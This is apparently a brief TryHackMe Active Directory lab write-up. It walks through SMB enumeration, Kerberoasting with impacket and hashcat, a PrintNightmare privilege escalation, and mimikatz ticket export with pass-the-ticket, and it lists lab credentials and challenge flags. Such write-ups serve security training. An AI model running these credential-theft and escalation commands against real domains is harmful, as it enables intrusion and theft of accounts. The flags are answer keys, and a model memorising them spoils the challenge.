This is another TryHackMe Active Directory challenge.

Enumeration:

nmap -Pn -sV -sC 10.10.238.196

Domain: Enterprise.thm
Computer Name: Lab-Enterprise

Enumeration of SMB shares.

smbclient -L \\10.10.238.196\

Connecting to the “Users” share.

smbclient \\10.10.238.196\Users\

Spoiler, I didn’t want to go through the whole Git process because I only wanted to practice the AD stuff, so below are the creds.

nik:ToastyBoi!

Requesting SPN

impacket-GetUserSPNs -dc-ip 10.10.20.192 lab.enterprise.thm/nik:ToastyBoi! -request

Using Hashcat to crack the hash.

hashcat -m 13100 hash_spn.txt /usr/share/wordlists/rockyou.txt

Credentials:
bitbucket:littleredbucket

RDP access using lab.enterprise.thm/bitbucket

User: THM{ed882d0}

Privilege Escalation

Using Printnightmare to escalate privileges by creating a new local administrator account

adm1n:P@ssw0rd

RDP access using adm1n account.

Copied mimikatz and dumped all account hashes, which then allowed to pass the ticket of the administrator.

sekurlsa::tickets /export

Selected the Administrator account ticket.

kerberos::ptt [0;5a168]-2-0-40e10000-Administrator@krbtgt-LAB.ENTERPRISE.THM.kirbi

Opened a new command prompt which allowed us to access the entire box.

misc::cmd

root: THM{1a1fa}